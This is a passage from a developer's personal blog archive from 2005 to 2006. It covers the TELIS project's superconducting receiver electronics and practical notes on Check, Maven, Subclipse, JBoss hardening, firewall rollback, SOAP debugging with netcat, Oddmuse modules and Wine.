The upper part of the schema I've explained. On to the middle left. The FFO is happily radiating away and the frequency drifts. To keep the FFO from drifting, you want to lock it. An external (meaning outside of the cryogenic flask) piece of electronics creates a phase-locked loop (PLL). This keeps the FFO on its set frequency. It operates using a 400 MHz reference frequency generated by the LSU board, as well as the output of the HM, which is run through a mixer first. This frequency is in the MHz range for practical reasons.

Note that the FFO is extremely sensitive: you put a bias voltage on it, and for every millivolt, the frequency changes by 484 GHz. Since we want to work with steps of 0.5 MHz, this means we have to change the bias at the nanovolt level.
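
The worked numbers: a step of 0.5 MHz divided by 483.6 GHz per mV gives

  0.5e6 Hz / 4.836e14 Hz/V ≈ 1e-9 V = 1 nV

per step.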

Like the SIR, the Telis PLL is a Russian product. It has an analog output with which you can check the quality of the phase locking.

telis pll.png

If you take a step back, you can see that the LSU, Harmonic Mixer, FFO and PLL work together to get a steady signal of, say, 656 GHz. It is also possible to control this signal in steps of 0.5 MHz. This is then used to feed into and read out the SIS mixer.

2006-04-24 SIRs for dummies

Previously, I showed some pictures on the electronics that are controlled by the software I maintain and enhance. Now I'll explain what exactly is controlled.

We're basically commandeering a SIR, which stands for Superconducting Integrated Receiver. It's a tiny (4 by 4 mm) chip with which signals are measured in the 500 to 650 GHz range. The chip is set behind a silicon lens and put in a container which is supercooled to about 2 to 4 kelvin.

Below is a picture of the SIR chip, a Russian product from the Institute of Radio-engineering and Electronics of RAS:

SIR chip.jpg

Legend: between the zero and one, the flux flow oscillator (FFO) is located. The Harmonic Mixer is located below that. More about these in a later entry. Right in the middle, a SIS mixer is etched (superconductor-insulator-superconductor). If you look at the SIS mixer from the side, you could sketch it (very badly) as follows:

sis.png

The F2 signal comes in from the atmosphere and is very weak. The F1 signal comes from the FFO, which generates a very steady, known signal. Out comes a signal which is basically F1 minus F2 and which can be amplified enough to read out. When a signal hits the SIS mixer, the resistance changes slightly and you can read this out via the current.

The base as well as the edges left and right are conducting. When the chip is supercooled, they become superconducting. The edges are separated from the base by an insulating layer (hence the name SIS). A constant bias voltage is put on the edges (denoted in the sketch by Bias) and the current I varies to keep the voltage constant. Below this construction, another conducting line is etched, the Control Line (denoted by CL), about which I'll tell more below.

We can draw a curve with the values of the current I and the voltage V, which is called an I/V curve:

SIR IV curve 2.png

If you want to get a clear signal, your curve should be like the thick red line. (Note that the slope of the curve corresponds to the inverse of the SIS mixer's resistance.) However, that is not the case: we get the grey line. It wiggles a bit, even goes down a bit before it rises, and then continues in a linear fashion after a bend. To get the thick curve, we need the control line on the SIR chip.

More about the control line. This line is conducting and etched below the SIS mixer. It must generate a magnetic field, drawn as the small circle around the control line and extending over the base. To keep the magnetic field constant, the current must be kept constant.

Besides the control line, the FFO is operated (more about that later). The FFO generates a clean signal with a certain power, which lifts the grey line up.

When combined, we get the red line, but it can still go down a bit like the grey line. We need to find a couple of values to get a clear signal: the current and the bias voltage on the SIS, and the current on the control line. So what do we do: we set a certain current on the control line, then for that current, vary the bias voltage on the SIS from, say, 1 to 10 mV.

SIR bias cl values.png

In the meantime, we read out the current on the SIS. We can then draw the I/V curves as shown above and see whether we get a nice straight curve.
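
In pseudo-Perl, the sweep would look something like this (helper names and step sizes are invented):

  for my $cl (@control_line_currents) {
      set_control_line($cl);
      for (my $bias = 1; $bias <= 10; $bias += 0.05) {    # mV
          set_sis_bias($bias);
          push @curve, [ $cl, $bias, read_sis_current() ];
      }
  }
  # then draw one I/V curve per control line setting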

Note: to keep the voltage constant on the SIS mixer, we need some kind of circuit:

sir schakelingen.png

The left circuit is a voltage source. If the current changes due to radiation hitting the SIS mixer, this circuit measures the change and, with some filtering, adjusts for it so the voltage stays equal. The right circuit is an alternative, an adjustment of the left circuit so it delivers a constant current instead of a voltage.

What is eventually done with the resulting signal? Well, when the signal comes in from the atmosphere, you want to analyze the spectrum (spectroscopy) and see what kinds of gases are there.

2006-03-08

Check, like most test frameworks, has the following hierarchy:

  main()
  |-- Suite1
  |   |--TestCase1
  |   |  |--TestA
  |   |  |--TestB
  |   |  |--TestC
  |   |  |--TestD
  |   |  `--TestE
  |   `--TestCase2
  |      |--TestF
  |      `--TestG
  `-- Suite2
      `--TestCase1
         |--TestA
         |--TestB
         |--TestC
         |--TestD
         |--TestE
         |--TestF
         `--TestG

It's notable that the author chose to have a lot of Suites named after whatever is being tested (say, logging), each having one TestCase named "Core". Sometimes there's a second or a third TestCase. Each test case has multiple tests, mostly a dozen or so.

The author has a src and a tests directory. In the tests directory, there is one main file called check_check_main.c which contains one main() function. This function adds all suites and runs them. It knows about the suites because there is a header file called check_check.h which declares all the test suites. Then there is a separate file for each suite; for example, check_check_msg.c contains one test suite and a dozen tests. It includes the header file check_check.h and all header files necessary to test project code.

Notable differences with JUnit are:

  • You code the test runner, while in JUnit you just define tests and run them with either an IDE plugin or on the commandline with your build tool.
  • Files do not have a separate setup() and teardown(). It remains to be seen whether these are needed.
  • Since you code the runner yourself, a plugin for an IDE like Eclipse could be somewhat problematic. Users could code their tests, but the plugin would have to parse for the name of the test suite and compile a test runner itself. That last step is where things could go wrong, but I might be too negative.

2006-03-01

I've started using Check, a unit testing framework for plain old C. The documentation isn't lacking, but here's an example test file and the corresponding Check unittest Makefile anyway.

Check can also output XML, which is useful for reporting on nightly builds. I've created an XSLT to convert to HTML: check unittest.xslt. It's very basic -- adjust to your needs. You can generate such a report on the commandline with a quick

  $ xsltproc check_unittest.xslt check_output.xml > report.html 

2006-02-23 Pictures from TELIS Project

Some pictures from work, all related to the TELIS project.


ffo sis ssb lsu 1.jpg

These are most of the boards that will be aboard the Telis balloon. From left to right:

  • FFO/PLL board, which measures and commands the flux flow oscillator and phase-locked loop, which I explain in [2006-04-25_SIR_acronym|this entry]
  • SIS board, which is connected to the electronics "in the cold" (i.e. the supercooled container) for operating the SIR, the superconducting integrated receiver
  • SSB, a board which contains the FPGA and talks through a serial port to the PC hardware
  • LSU -- Local Source Unit, a board containing other necessary functions, like several temperature sensors, heaters and the generation of a 20 GHz signal (more on this some other time)

The power supplies in the background are set to about 6 volts and are connected to the backplane at the far left (hard to see). Besides power, this backplane also provides communications.

The whole package, including batteries (see image below), will be enclosed in a casing, which will be put aboard the gondola.


batteries and charger 1.jpg

The boards need to be powered on the balloon, which is why a battery pack will be connected to the backplane in the space in the middle (see first picture). SRON built a custom charger for the also custom-made battery pack.

2006-02-13

Note: I've expanded this entry in article Configuration.

In a non-trivial project, several programming languages will often be used. Keeping a common configuration file can become something of a nuisance. While it's easy enough to decide on one format, things like variables aren't easily shared between languages. For instance, you want to be able to have stuff like this:

  user=testuser_1
  bindir=/home/$USER/bin

Which will work fine for a file that you include in a Makefile. But for a PHP script, this is a pain. This is where m4 comes into play.

Just create a file called Config.m4 and put all your variables there in the following format:

  define(_USER_,testuser_1)dnl
  define(_GROUP_,testgroup)dnl

Then create a basic configuration in a file called Config.template as follows:

  user=_USER_
  group=_GROUP_
  bindir=/home/_USER_/bin

As part of your Makefile or Ant's build.xml, run m4 as follows:

  m4 Config.m4 Config.template > Config.h
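
To show the multi-language point: the PHP side gets its own template, fed from the same Config.m4. For instance, a Config-php.template (illustrative):

  <?php
  $user   = '_USER_';
  $bindir = '/home/_USER_/bin';
  ?>

generated with:

  m4 Config.m4 Config-php.template > config.php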

Voilà, problems solved!

2006-02-01

I've been working with Subversion, especially from within Eclipse using the Subclipse plugin. I had earlier experience with the CVS plugin that comes with Eclipse. This is with Eclipse 3.1.1, Subclipse 3.0.1 and Subversion server version "SVN/1.1.4".

Some bad differences:

  • Slow. While CVS isn't the fastest animal, I found some actions in Subversion even slower. And sometimes Subclipse just leaves you waiting up to tens of seconds when for example a conflict is detected. UPDATE: after posting on the excellent Subclipse mailing list, the problem was acknowledged. A few days later, a release was available through the Eclipse update screens which fixed this bug.
  • When entering the Team Synchronize perspective, it happened once that although the "Incoming/Outgoing mode" was selected, only the incoming files were displayed. Switching to "Incoming Mode" and back again showed everything. Hmm -- smelly!
  • Minor issue: when you have made a few changes and decide against it, you can right-click on the source and choose Replace With -> Latest from repository. Subclipse performs this, but Eclipse then asks something like "File changed on filesystem. Do you want to load the changed file into the editor?" Apparently, the integration isn't yet up-to-par.

Some differences I'm neutral about:

  • In the Synchronization perspective, sometimes you review changes in a file and decide they should be left out. Funny thing is, you can't right-click and select 'override and update'. It's greyed out for whatever reason.
  • When the repository contains a newer version, you often synchronize the file and choose 'override and commit' with the CVS plugin. With Subclipse, you synchronize, choose 'Mark as merged' and then commit.
  • Whenever an error occurs (for example, you tried to commit a file which had conflicts), a little exclamation mark is displayed at the left side of the filename. You always need to right-click and choose 'Mark resolved' before you can continue.
  • Directories are versioned as well. In the Synchronization perspective, you can't update a whole directory. Well, you can, but it doesn't disappear from the file list. You'll have to select the files as well as the directory.
  • I was used to the CVS plugin. When I wanted to start working on a project that was kept in CVS, I used to do menu File -> New -> Project, then choose CVS -> Checkout project from CVS. The Subclipse plugin doesn't put itself in the New Projects wizard. Instead, go to the SVN Repository Exploring perspective, seek out your project's directory, right-click on it and choose Check out. You'll then get the option to check out as a project using the New Project wizard.

Good things:

  • You can just press 'Cancel' in whatever action -- Subclipse rolls back since Subversion uses transactions. With Eclipse's CVS plugin, this isn't possible (and with good reason or so I've heard).
  • About Subversion in general: when you check in, you basically create a new revision. It's the collection of files that has a version, not each individual file. The complete commit has one commit comment -- not each file.
  • About Subversion in general: symbolic links, permissions, everything's nicely stored.

Tips

  • Subversion can handle symlinks all right. However, Eclipse isn't so good with them, and thus Subclipse has a few funny quirks as well. For instance: use Subclipse to do a checkout of a project that contains a broken symlink to a directory outside the project. On the commandline, do svn status. No differences. In Eclipse, do menu Team -> Synchronize. A difference shows up, namely the (broken) symlink. Weird... I've taken this up with the developers and might write about it later.
  • If you're a CVS user, read Appendix A of the SVN manual for CVS converts

Conclusion

All in all, I have the feeling there are a few minor bugs (or not-so-fantastic features) to be ironed out in Subclipse. However, if you're fed up with CVS then starting small with one project is worth it.


2005-12-14

Awwww, Maven, you kill me, you really do!!

You maintain your Maven project's documentation in a simple XML dialect called xdocs. It's then transformed to HTML and copied to the project's website. A colleague updated the documentation and then did a "maven multiproject:site site:deploy". He saw that the generated HTML documentation wasn't updated. Except it was. Look at the following source:

  <?xml version="1.0" encoding="utf-8"?>
  <document>
  <properties>
  	<title>Release notes</title>
  </properties>
  <body>
  <subsection name="SuperProject-2.5.2-build04.ear">
  ....
  </subsection>
  <section name="Releases SuperProject">
  <subsection name="SuperProject-2.5.1-build01.ear">
  ...
  ...

Notice the error? The <section> tag is placed below the <subsection> tag. Why in hell this validates is unclear to me. Is it validated in the first place? TELL ME IT IS!! Another man-hour or two wasted.

2005-12-08

After firewalls are in place, you're not done securing JBoss 3.2.6. At the least, passwords should be set on the jmx-console and web-console applications.

Go to $JBOSSHOME/server/yourconfig/deploy and take the following steps to secure the jmx-console application:

  1. Edit jmx-console.war/WEB-INF/web.xml, search for the line with "security-constraint" and uncomment the block
  2. Edit jmx-console.war/WEB-INF/jboss-web.xml and uncomment the line with "security-domain"
  3. Edit jmx-console.war/WEB-INF/classes/jmx-console-users.properties and replace the second "admin" by your favorite password

Now do the same for the web-console application:

  1. Edit management/web-console.war/WEB-INF/web.xml,
    search for the line with "security-constraint" and uncomment the block
  2. Edit management/web-console.war/WEB-INF/jboss-web.xml
    and uncomment the line with "security-domain"
  3. Edit management/web-console.war/WEB-INF/classes/web-console-users.properties and replace the second "admin" by your favorite password

Besides the above steps, you'll probably want to remove the status application, the HTTP invokers, maybe JMS, etc. An excellent book is O'Reilly's JBoss, A Developer's Notebook. Chapter 9 is freely available online, which walks you through the above steps and much more.

(Re)start JBoss and go get your brownie points from the system administrators!

2005-11-28

Every now and then you'll make a mistake while updating firewall rules and lock yourself out. There's a nice trick to avoid this, if you're disciplined enough to take the following steps:

  1. Copy the existing firewall rules to a new file
  2. Schedule a job that reloads the existing firewall rules in, say, 30 minutes
  3. Edit the firewall rules in the new file
  4. Load the new firewall rules and test them
  5. Remove the scheduled job and copy the new file over the old one

If the new firewall rules lock you out in step 4, you won't be able to remove the scheduled job, and the old rules will be loaded in 30 minutes or so!
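
With iptables and at(1), the recipe could look like this (a sketch; the file names are made up):

  # iptables-save > /root/fw.known-good
  # echo "iptables-restore < /root/fw.known-good" | at now + 30 minutes
  # cp /root/fw.known-good /root/fw.new && vi /root/fw.new
  # iptables-restore < /root/fw.new
  # atrm 1                           (job number as listed by atq)
  # cp /root/fw.new /root/fw.known-good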

Thanks to an experienced sysadmin for this tip...

2005-11-25

ibiblio.org was offline today. This meant my build didn't work. Of course, no error was given, which we've come to expect from Maven ;)

All it said was:

 $ maven jar:install
  __  __
 |  \/  |__ _Apache__ ___
 | |\/| / _` \ V / -_) ' \  ~ intelligent projects ~
 |_|  |_\__,_|\_/\___|_||_|  v. 1.0.2
 
 Attempting to download one-of-our-libraries.jar.

Then it just kept waiting and waiting.

So after one of the developers wasted an hour or so finding out what the hell went wrong, he walked over to one of the sysops. This clever sysop got the luminous idea to ping ibiblio.org. Offline... After that, it was a quick fix to temporarily remove ibiblio from the remote repository line in the project.properties.
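
That line, for reference, is the maven.repo.remote property; with ibiblio taken out, it would read something like:

  maven.repo.remote=http://repository.mycompany.com/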

This goes to show how important it is to display understandable errors to the user. Come to think of it, it also goes to show how you should try to catch errors and see if there's a way to continue.

And why the flying freak is this thing looking on ibiblio for our proprietary libraries?

2005-11-23

Today, I'd like to talk to you about Maven and rights. Maven must be able to deploy to a central place, the remote repository. We'll do this using sftp. Now look at the following output:

 jar:deploy:
     [echo] maven.repo.list is set - using artifact deploy mode
 Will deploy to 1 repository(ies): R1
 Deploying to repository: R1
 Using private key: /home/user1/.ssh/keytest
 Deploying:  /home/user1/blah/myproject/project.xml-->myproject/poms/myproject-3.6.1-build01.pom
 Failed to deploy to: R1 Reason: Error occured while deploying to remote host:repository.company.com:null
 
 BUILD FAILED

The problem turned out to be a rights issue: the file already existed, but wasn't writeable:

 $ cd /var/www/repository/maven/ZIG/poms
 $ ls -l myproject-3.6.1-build01.pom
 -rw-r--r--  1 user2 users 3870 Nov 23 16:42 myproject-3.6.1-build01.pom

Don't you just love this stuff? Only took about two hours. For three team members.
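
A fix could be to make the file (or the whole tree) group-writable, for example:

 $ chmod -R g+w /var/www/repository/maven

and to agree on a umask for everyone who deploys.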

2005-11-04

Maven, oh, Maven. Funny how many bugs this package brings up. And I don't mean its own bugs!

In the previous post, I discussed "deploying", which is Maven-speak for building a jar/war/ear of your project and then copying it to a server where other dependent projects can get it.

This works. However, I documented this procedure using scp. Today I had to configure a project which used the exact same properties, but with sftp. Of course, Maven flunks out with a NullPointerException (wouldn't you?):

  java.security.NoSuchAlgorithmException: DH KeyPairGenerator not available
  java.lang.NullPointerException
        at com.jcraft.jsch.jce.DH.getE(Unknown Source)
        at com.jcraft.jsch.jce.DHG1.init(Unknown Source)
        at com.jcraft.jsch.Session.receive_kexinit(Unknown Source)
        at com.jcraft.jsch.Session.connect(Unknown Source)

I checked out that same project locally and Maven did work fine there. But not on the shared development box. The difference? Locally, J2SDK 1.4.2 build 08 was installed; on the development box, version 1.4.2 build 03. There was a difference of a few files, and besides font.properties stuff, they were related to security:

  $ diff list_j2sdk142_03 list_j2sdk142_08
  < ./jre/lib/old_security
  < ./jre/lib/old_security/cacerts
  < ./jre/lib/old_security/java.policy
  < ./jre/lib/old_security/java.security
  < ./jre/lib/old_security/local_policy.jar
  < ./jre/lib/old_security/US_export_policy.jar
  < ./jre/lib/security/jce1_2_2.jar
  < ./jre/lib/security/sunjce_provider.jar
  > ./jre/lib/security/cacerts
  > ./jre/lib/security/java.policy
  > ./jre/lib/security/java.security

Hmm... weird. After installing the new J2SDK build on the development box, the stacktrace didn't appear, but Maven quit with an error nevertheless:

  Will deploy to 1 repository(ies): R1
  Deploying to repository: R1
  Using private key: /home/the_user/.ssh/id_rsa
  Deploying:
  /home/the_user/tmp/OUR_PROJECT/OUR_SUBPROJECT/project.xml-->OUR_PROJECT/poms/OUR_SUBPROJECT-0.2.0-build4-SNAPSHOT.pom Failed to deploy to: R1 Reason: Error occured while deploying to remote host:repository.the.company:null
  BUILD FAILED
  File...... /home/the_user/.maven/cache/maven-multiproject-plugin-1.3.1/plugin.jelly
  Element... maven:reactor
  Line...... 217
  Column.... 9
  Unable to obtain goal [multiproject:deploy-callback] -- /home/the_user/.maven/cache/maven-artifact-plugin-1.4.1/plugin.jelly:94:13: <artifact:artifact-deploy> Unable to deploy to any repositories

Then my eye fell on the sftp line in the project.properties:

  maven.repo.R1=sftp://repository.the.company

Hmmm, in another project this said 'scp' instead of 'sftp'. So I set it to scp... and behold, all was good again!
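
In other words, the workaround is this one-line change in project.properties:

  maven.repo.R1=scp://repository.the.company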

To reproduce:

  1. Install J2SDK 1.4.2 build 03
  2. Install Maven 1.0.2
  3. Set JAVA_HOME to that directory
  4. Update PATH variable to point to $JAVA_HOME/bin
  5. Create Maven project and use sftp in project.properties
  6. Type maven jar:deploy

I haven't tested whether it's important, but this is with OpenSSH_3.8.1p1.

2005-10-26

More Maven findings. I've said before that in my humble opinion, Maven is too much in a state of flux to start using it in projects. I think this shows itself when you encounter older Maven projects, especially on the subject of repositories.

Maven uses repositories, where jars are kept. Those jars can be your own or someone else's. There are two types of repositories, local and remote. Local means on your own disk. Remote means ibiblio and your organization's repository. When the documentation talks about central repositories, it mostly means remote repositories.

You'll probably want to use goal "jar:deploy" to copy your jars, wars and ears (artifacts in Maven-speak) via scp or sftp to some central box, your own organization's remote repository. Update: sftp might not work for you, see 2005-11-04

These need to be defined in your project.properties, see the Maven documentation on internal repositories:

  maven.repo.list=myrepo
  maven.repo.myrepo=scp://repository.mycompany.com/
  maven.repo.myrepo.directory=/www/repository.mycompany.com/
  maven.repo.myrepo.username=${user.name}
  maven.repo.myrepo.privatekey=${user.home}/.ssh/id_dsa

This way, everyone can deploy using his own username. This has the following advantages:

  1. You don't need to set up a generic account with a shared password
  2. You can always trace back a release to a specific user, which is useful when there are problems and you know how the build was done

Of course, there's a catch: everyone must use the same key filename, and some users called theirs id_rsa or privatekey or cheese_sandwich. Maven can't figure this out by itself the way standard ssh can. So we help it along: create a file in your home directory called build.properties and add the following line to it:

  maven.privatekey=/home/user/.ssh/myprivatekey

And edit the line in your project.properties to read:

  maven.repo.myrepo.privatekey=${maven.privatekey}

There are also the following properties, which are deprecated and shouldn't be used. I encountered them in an older project along with the above properties and it took me a while to find out they're documented in the Maven properties documentation:

  maven.repo.central=repository.mycompany.com
  maven.repo.central.directory=/www/repository.mycompany.com/

Note how the documentation above all the options says this stuff is deprecated, and then continues to say in the description for each option that it's deprecated and you should use deploymentAddress and deploymentDirectory in project.xml. Read on and shiver: those are deprecated as well. Deprecation upon deprecation, welcome to Maven!

Anyway, the myrepo directory should be published with Apache or a similar webserver, and the URL of that particular directory should be put in the remote repository property:

  maven.repo.remote=http://www.ibiblio.org/maven,
    http://repository.mycompany.com/maven
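
A quick sanity check that the webserver really publishes the repository; the exact path below is hypothetical, following the layout of the deploy output above:

  $ curl -I http://repository.mycompany.com/maven/myproject/poms/myproject-3.6.1-build01.pom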

N.B. Don't confuse all this stuff with the elements <siteAddress> and <siteDirectory> in your project.xml, these are used by the goal "site:deploy".

2005-10-06

A colleague offered advice on setting up an Excel spreadsheet that is useful for managing features in a software development project, a.k.a. feature culling. This happens when you are planning a new project and you and/or management have to decide what goes in and what doesn't. Open the template and put all features in the feature column. Then play with the inclusion of features for each version by entering or deleting a 1 in the version columns. You can immediately see the effect a feature has on the development time.

Here is the template: feature culling.xls

Joel Spolsky offers more insight into planning, with a few helpful Excel tips.

2005-09-26

Because of my recent wrestling match with Maven, a friend pointed me to this entry in the Bileblog.

Hilarious quote:
First problem, I see maven crud splattered all over. My heart sinks as I see the 3 tongued kisses of death; maven.xml, project.xml, and project.properties. This cannot possibly go well.

2005-09-15

I'm currently wrestling with Maven and I have several gripes.

I'm using version 1.0.2. Before you complain that I should upgrade: version 1.0.2 is the one the Maven team considers stable, and thus suitable for a production environment.

On to my gripes:

  • Maven tries to establish one standard directory structure. That goal is reached gradually, version by version, which I can understand. However, why the hell isn't this made clear? Different directory structures are all over the place:
    • The structure you generate with maven appgen is different from what is documented on the website.
    • The website itself is inconsistent. The ten-minute-test for Maven 1.0 specifies src/main/java and other random pages (this one for example) specify src/java
    • You're building a war, so you use the ten-minute-test directory structure. It all works, except your index.html and web.xml don't get included in the resulting war. After an hour or two, you find the maven.war.src setting for your project.properties and set it to ${basedir}/src/main/webapp
  • It's possible to do maven eclipse and generate a faulty .project and .classpath
  • Sometimes, <resource> sections don't get included when doing a maven eclipse (see below)
  • Why isn't the documentation delivered along with the download? Now you don't know whether the website reflects 1.0.2, 1.1 beta or 2.0 alpha.
  • If you're behind a proxy, you have to set that proxy in your project.properties, otherwise Maven can't reach ibiblio.org (the relevant properties are shown after this list). However, if you do a maven site:deploy, you have to switch it off again because you're deploying to an internal box; Maven doesn't know that this particular box is internal. (This is more of a Java problem: Java doesn't integrate well with how the underlying OS administrates proxies.)
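
For reference, the proxy settings in question look roughly like this in project.properties (hostname and port hypothetical):

  maven.proxy.host=proxy.mycompany.com
  maven.proxy.port=8080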

Be careful with multiproject, too:

  • Do you actually need it? Is it necessary that SubProject A and SubProject B use different versions of SharedSubProject C?
  • Say you increment the version of a subproject and you increment the version in the multiproject.xml. Build. Watch it fail. You should first build the subproject manually!
  • How are you going to manage those versions in CVS? Set up procedures for this. Maven does not magically help you with proper tagging and release procedures.
  • Multiproject and xdocs don't work intuitively; for instance, the javadoc from the subprojects is not reachable from the main page when you provide your own navigation.xml
  • You can't do maven multiproject:eclipse or maven multiproject:idea
  • If I have a multiproject, why can't it figure out that the subprojects depend on each other? It's already specified in the project.properties of the main project. Yes, a colleague found out you can do pom.currentVersion, as in the dependency below, but Maven should be able to figure this out automatically:
    <dependency>
      <groupId>UberProject</groupId>
      <artifactId>UPNet</artifactId>
      <type>jar</type>
      <version>${pom.currentVersion}</version>
      <properties/>
    </dependency>
  • The same basically goes for multiproject and the eclipse goal: subprojects are included in the classpath as jars, but typically you work on both so you'll have to manually delete the jars from the classpath and add the projects
  • More of a gripe with Eclipse: multiprojects and Eclipse don't really match.

Conclusion

I've got most of it figured out, but I've wasted so much time that I could've written three complete Ant scripts by hand. So, it takes around three projects to get an increase in productivity by using Maven. In conclusion, I would advise other developers to stick with Ant and wait for this mess to be cleared up.

Plugin problem

Oh and if you have to upgrade a plugin because it has a bug, take the following steps to avoid this message:

  WARNING: Plugin 'maven-site-plugin' is already loaded from
  maven-site-plugin-1.6.1; attempting to load maven-site-plugin-1.5.2

  • Remove the cache directory in ~/.maven
  • Copy the jar of the new plugin into your Maven installation's plugins directory
  • Remove (DON'T JUST RENAME) the old version of the plugin

We had to upgrade maven-site-plugin from 1.5.4 to 1.6.1, and I renamed the 1.5.4 jar to maven-site-plugin-1.5.4.jar.bak. However, by some crazy mechanism Maven downloaded the old plugin into the cache again.
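
In shell terms, the safe sequence is roughly this (assuming Maven lives in /usr/local/maven):

  $ rm -rf ~/.maven/cache
  $ cp maven-site-plugin-1.6.1.jar /usr/local/maven/plugins/
  $ rm /usr/local/maven/plugins/maven-site-plugin-1.5.4.jar   # remove, don't rename!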

Eclipse filter and empty directories

There's a problem with Eclipse which isn't likely to show up except when you use CVS and Maven's Eclipse plugin.

Suppose you have a bunch of empty directories, and when you check out with Eclipse, you filter them out:

  • Go to the Package Navigator and pull open the menu
  • Select Filters
  • Choose "empty packages"

Also, you have a directory structure like this:

  myproject
  \--- src
       |--- main
       |    |--- java
       |    \--- resources
       \--- test
            |--- java
            \--- resources

You run maven eclipse to generate your classpath, which will now include main/java and main/resources. In main/resources, a bunch of properties files reside. You want to be able to see them. But you can't. Why not? Eclipse decided it's an empty package. Which it is....

What's conceptually wrong here is that Eclipse doesn't have a classpath setting, only a source path setting (configurable via menu Project, Properties, category Java Build Path, first tab Source). But it's not a source path, it's part of the classpath!

2005-08-26

Messing with SOAP? Using Axis? Need to debug it?

I assume you have a client and a server and want to see the exact traffic. Don't go through the mess of configuring the SOAPMonitor; it doesn't show you the exact input and output, which obviously is a problem. Instead, use plain and trusted standard Unix tools.

To view client output:

  • Start netcat with "nc -l -p 8080". To save the output, append "|tee output"
  • Run your client, pointing to port 8080

To view server output:

  • Start your server, which listens to, say, port 8080
  • Send your saved output to the server, like this: "cat output | nc localhost 8080"

You could also use a traffic dump, but this is easier to read.

2005-08-06

A personal note: you have probably all heard or seen short news blurbs on the heavy rain in India on the radio or TV. However, lots of us in the IT industry have friends and colleagues there, so in addition to the somewhat limited media coverage I'd like to point out some extra news sources to get a more complete picture. If you're on a tight schedule, use the first link to get a visual impression.

Finally, a friend in the area reported that Bangalore and Hyderabad (where the brunt of the IT industry is located) are fine currently.

I'm ending with a tip: if you want to keep track of a certain area, go to the Times of India, and click 'Cities' in the left navigation bar.

2005-06-28

And yet another Oddmuse module. This one provides RSS syndication for people who have Oddmuse installed but can't or won't install the required Perl module XML::RSS. A sign that this module is missing is that adding the RSS feed to an RSS reader results in an error. Also, right-clicking and saving the RSS link results in an empty file.

To install:

  1. Download the file simple rss.pl
  2. Upload it into your wiki's modules directory

To test, add the link to the RSS feed to your favorite reader.

2005-06-23

I've created another little Oddmuse module to display a Google Free Search or Adsense Search box on an Oddmuse wiki. I called this one google search.pl. The previous module, adsense.pl, displayed AdSense banners above pages.

Instead of (or in addition to) the usual search box, a Google search box can be put below every page. When an administrator is logged in and enters the Administration page, the normal Search & Replace boxes are shown.

To use this module on your Oddmuse wiki, take the following steps:

  1. Go to the Google Free Search page and copy the code, or alternatively, copy the AdSense Search code
  2. Create a new page called GoogleSearch and paste the code you just copied.
  3. Lock the page; this piece of code will be added to every page on your Wiki
  4. Download the google search.pl module and upload it into your modules directory
  5. Go to your wiki or reload the page if necessary, and voilà, the new search box is shown!

If you want to have the normal Oddmuse search box shown, edit the module and set the variable $showOddmuseSearch to 1.

2005-06-09

(English readers: this is a comparison of Dutch and US hosting companies offering Virtual Private Servers)

I've put together an overview of cheap providers of Linux VPSes (Virtual Private Servers). Ideal for techies who currently have their own website but are looking for more possibilities, or for webmasters with system administration experience. The selection only includes offerings under fifteen euros.

2005-05-26

Adding search engines to Firefox is so easy that it's embarrassing. As noted before, I'm using Atlassian's Jira at work to track issues in the software, and being able to search through them straight from the browser is pretty useful. To be able to do this yourself, create a file called jira.src in your Firefox searchplugins directory with the following contents:

  <search
     name="Jira"
     description="Jira Search"
     method="GET"
     action="http://yourbox:port/secure/QuickSearch.jspa"
     queryEncoding="utf-8"
     queryCharset="utf-8"
  >
    <input name="searchString" user>
  </search>

To adapt the file to your situation:

  • Adjust the action, i.e. enter the correct hostname and port (if it differs from the standard port 80)
  • Adjust the queryEncoding and queryCharset fields; Linux boxes are usually set to utf-8, while Windows installations in the Western world use windows-1252

To quickly search using the keyboard:

  1. Press CTRL-J or CTRL-K to go to the search box
  2. Pound CTRL-Down one or more times to select the Jira search option
  3. Type a few keywords and press Enter

If you put the Jira logo in the searchplugins directory (typically as an image with the same base name, e.g. jira.png), it'll be shown instead of the magnifying glass when picking your new Jira search plugin.

2005-04-25

I've created a five-line Oddmuse module to display Google Adsense. I called it adsense.pl.

All it does is place a piece of JavaScript at the top of each page when the user is browsing (but not when editing a page, using the administration screens, et cetera).

To use, take the following steps:

  1. Login to your Adsense account, and copy the JavaScript code that's generated
  2. Create a new page called 'adsense' and paste the JavaScript code
  3. Lock the page if necessary; this piece of JavaScript will be added on top of every page on your Wiki
  4. Download the adsense.pl module and upload it into your modules directory
  5. Reload your home page, and voilà, your ad is shown! You might want to add a <div> or a <p align="center"> around your ad code.

There is a TODO list for this module, some of which I've already implemented.

2005-04-24

Today, Slashdot linked to a slightly negative Forrester report on aspect-oriented programming (AOP). It was compared with the GOTO statement and other features that were deemed ugly. I haven't formed a firm opinion yet on AOP, but I do know that there are lots of things that are awkwardly expressed in an OO language such as Java. If AOP can make one more productive, then I'm inclined to just salute the effort.

True visionaries take a broader view: Jim Coplien wrote an article in 2001 on symmetry and broken symmetry in programming languages. And in 2004, Victoria Livschitz gave her opinion on what she thought the next move in programming would be. Highly enlightening, especially in light of the recent AOP "debates"...

2005-04-15

I've put an article on RFID online. I wrote it late last year, but it's topical again with the recent concerns about RFID privacy. It covers the basics, relates them to software development and the offerings on the market, and looks a bit into the future.

2005-04-14

I regularly buy a new version of Codeweavers' CrossOver Office, which is a commercial version of Wine -- a package to run Windows software on Linux. All their code is open source; you basically pay for support and for Wine being repackaged in a user-friendly way, with an installer, help files, et cetera.

They have an online database where applications are rated for usage. Each application has one or more "advocates", who maintain the usability status for the app. I've become an "advocate" for Enterprise Architect, an excellent UML modelling package.

The short story is that EA runs pretty well on Linux. They even have a webpage dedicated to running their software using CrossOver, and gave an interview on this subject. I've had one crash, and some widgets aren't drawn correctly, but otherwise it works fine.

If you're still interested, regularly check the CrossOver Enterprise Architect compatibility database entry because I'm planning to keep it up-to-date with tips and tricks.

2005-04-09

(Normally entries are in English, but this is applicable to Dutch users only).

To practice for the Dutch boating license (vaarbewijs), the ANWB course book Klein Vaarbewijs is sold with a CD-ROM containing a training program made by Promanent. The training program is a Windows application. However, at first sight this program doesn't work under Linux with Crossover Office, a commercial Wine version. Only a rectangle in the middle of the window is visible, as if you're looking at the application through a letterbox. By adding the following lines to the file ~/.cxoffice/dotwine/config (or wherever you installed Crossover Office), the whole application is shown in a new, separate window. The application is then perfectly usable.

  [AppDefaults\\winevdm.exe\\x11drv]
  "Desktop" = "800x600"

Although the executable is actually called VBEXAM03.EXE, you still need to specify winevdm.exe; winevdm.exe is the Wine way of running 16-bit applications. The only downside of this solution is that other 16-bit applications will now also appear in a separate window, but it's not very likely that you'll have several of those running at once.

2005-04-04

